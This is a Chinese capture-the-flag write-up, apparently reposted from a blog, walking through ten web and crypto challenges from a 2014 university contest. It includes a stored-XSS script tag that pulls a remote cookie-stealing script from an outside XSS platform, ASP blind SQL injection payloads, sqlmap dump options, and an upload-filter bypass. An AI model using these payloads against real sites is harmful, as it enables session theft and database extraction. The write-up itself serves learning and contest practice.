2014 isc.suse writeup

admin 2022年5月17日12:09:07评论16 views字数 3456阅读11分31秒阅读模式

0×00
最近有一些考试 blog都没更T T 计算机网络考试前一天 还在做题 真是no zuo no die的典范 不过今天计算机网络还是比较简单的 应该能过 比赛是四川理工的第一届比赛 http://isc.suse.edu.cn/ 10关 最后通关了 第二名 网站没开 之后再附上一些题目的截图

0×01 js
第一题 是个源代码的问题,比较简单 发现没法右键 查看不了源码 这里可能就会有一点问题 禁用右键可以用js实现 所以禁用js一般可以 不行的话就把页面另存为 自己本地看看 在文件里有js 里面又一段10进制的好像编码过的

t="75,101,121,58,87,101,108,99,111,109,101,95,84,111,95,73,83,67,95,115,117,115,101,95,54,54,54,54,54,54"

直接解码就是key 简单
Key:Welcome_To_ISC_suse_666666

0×02 加解密
一段 htmlencode的东西#x44; 一大串这样子的
把这段htmldecode 或者是直接保存到html文件中 浏览器打开 就可以看到

OGZmM2I5ZmJhYWQzNDg2MGQwYmMyYTc0NDhhODdhN2I=

看字符范围 是大小写数字 最后还有= 位数还是4的倍数 base64解密一下
8ff3b9fbaad34860d0bc2a7448a87a7b
小写加数字 32位 cmd5解一下md5
2014 isc.suse writeup
youcanfindme

0×03 http
题目是要算个5-6位的乘法和加法 有三个数吧
本来一开始想正常编程做的 都太懒了 就放着 后来发现了时间的限制是8秒 就淫荡了起来
直接开谷歌 用谷歌算 计算机去也是可以了 然后用单身20年的手速去粘贴回去提交 7秒 哈哈 就得到了key
后来大家交流的时候 还发现可以直接改包修改时间
Key:Hello!*ISC++

0×04 upload
有个突破上传的
这个题多试几次 要求上传php文件的 才会给key 有限制的只能上传gif的
然后就去研究一下源代码,发现那个检查gif是用了js来检查 然后就很简单了
用浏览器插件firebug去调试js 直接改gif为php chrome和firebug下面都有
然后再上传一个php的文件上去
回显
你以为我那么好骗的吗? 说了要上传gif图片的!!!
上传: Load.php 成功!!!
然后就根据这个提示 去找个gif的文件 改成php的再上传一次 估计是检验了文件幻数
回显
You Are Very GOOG!!
KEY: File_UPload!is+very-Simple!!

0×05 隐写术
题目给了个mp3 还有一个提示 information hide, steghide
然后就是听听mp3吧 在mp3的最后给了一个密码
1314528
根据提示 去找了一下steghide 是个隐写的工具 有下载的链接
http://sourceforge.net/projects/steghide/files/stats/timeline
下载一发
运行一下 得到了key
2014 isc.suse writeup
key: Hello_StegHide_iS_interesting

0×06 brute
爆破题 技术难度是没什么 不过做题平台居然有安全狗 无力吐槽啊 一直被咬死
给出了字典 user pass 要你去登陆 一个爆破的问题 用burp就可以了
数量是94*82=7708
设置一下intruder 变量改改 选择cluster bomb 可以同时使用两个不同的变量
然后再去载入他给的字典
2014 isc.suse writeup
设置好线程和时间间隔 因为有狗在所以别设置太快
pablo letmein
然后登陆就看到key了
key:!!Force_Crack!_IS_This*24835

0×07 XSS
一开始看到xss 是个留言板的xss 然后就是没有回显 提示过滤了alert啊 什么的 估计是要用xss平台去xss到cookie
然后就没做 先去做了后面的sql注入 发现了 因为是本站 所以sql注入可以注入到留言板的数据库guestbook 然后通过guestbook可以看到别人注入的语句 我看到前面有人做出来了 其实自己做也不难
参考了jim叔叔的语句
也看到jim叔叔试了几次 才成功 好刺激

<script src="http://lennyxss.sinaapp.com/3C9ee4?1399828748" >hehe</script>  

这个就是能成功的语句
然后去就登陆xss平台看看
发现了cookie里有key urldecode解密提交一下就可以
因为第一个注入可以看到guestbook 最后还发现有人有用他们学校的服务器接受cookie 吓尿了
key=XSS_Store_Is_*Very*_Simply

0×08 sqli
这个注入 是get型的mysql注入 因为有狗 sqlmap也不太好用了
晚上没人的时候 丢给sqlmap 还学习了新的sqlmap技巧 –delay=1 设置延迟时间为1秒
–dbs
–table
发现了guestbook 还有一些Users表 Users2 Users3 Users4 Users5
最后在User5发现看This_key
-T Users5 -C This_key –dump
key:MySQL_Inject_You_Are_Success

0×09 cookie注入
以前就见过的老题目 大一的时候做不出来 现在会了 零魂学长出的题目 比较古老了
是个cookie注入 比较纠结 中转出来吧
cookie中转成get 好跑sqlmap
我没中转然后丢给sqlmap 不晓得为什么不可以 –level 2 什么的 检测一下cookie
中转后 就是正常的注入 就是asp+access的列名不好猜 猜到了admin 还有一个存了密码的 psw
然后就去跑
admin
jiubugaosuni666
网站有个后台 去登陆一下
发现提示要自己找到后台 扫一发
/manage/ 目录 然后发现目录跳转了
跳转到了首页 提示说要来自 四川理工学院
加上一条referer

Referer: http://www.isc.suse.edu.cn/

还有referer 一般在后台是用正则匹配的 所以http://www.isc.suse.edu.cn不行 http://www.isc.suse.edu.cn/才可以 一开始没试出来 有点坑 正则没写好
然后就跳到了真正的后台

http://yutaiyuan.f3322.org/9/admin_main5418.asp

登陆一发
在后台找到了这样子的信息

MjY1NzIwNjBkMWZmNjk4MTgxMWIwNzlkMDQxMmQ2Y2Q=

base64解密
26572060d1ff6981811b079d0412d6cd
解一下md5 就是key了
youareverygood

0x0A blind sqli
盲注的题目 有点纠结 观察一下是asp 提交后的页面title还说是search 明显是asp的搜索型注入
然后就去注入
news是注入点
一开始没构造对 多了一个’ 还好音符牛带我飞 他会补上一个’ 我之前观察到了这个 以为会补在字符串后面 后来才知道是wenzhang后一位
这个是错误的 news=wenzhang’%’ and 1=1 and ‘%’=&searchs=%CB%D1++%CB%F7
正确的姿势

wenzhang%' and 1=1 and '%'='
wenzhang%' and 1=2 and '%'='

2014 isc.suse writeup
看看页面有注释提示 说key的管理员表中
manager

wenzhang%' and (select count(*) from manager)>0 and '%'='
wenzhang%' and (select top 1 len(id)from manager)>0 and '%'=' 

只知道个id的列
猜列名比较难 还去想偏移注入 发现都没回显 可以写脚本跑跑

wenzhang%' and (select top 1 len(admin_psw)from manager)>6 and '%'='
wenzhang%' and (select top 1 len(admin_psw)from manager)>7 and '%'='

发现了admin_psw的列名 长度为7 手工注入一次

wenzhang%' and (select top 1 asc(mid(admin_psw,1,1))from manager)>47 and '%'='

结果是
48 73 53 79 56 75 33
解一下ascii码
0I5O8K!

0x0B 后记
考试前做题 真是作死
网站有狗不科学啊 sqlmap burp 神器用得不爽
不过也学会了特殊的延时技巧
还有一些asp+access的特性 之前也日了一些asp的站 涨姿势

FROM :appleu0.sinaapp.com | Author:appleu0

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月17日12:09:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2014 isc.suse writeuphttp://cn-sec.com/archives/1012372.html

发表评论

匿名网友 填写信息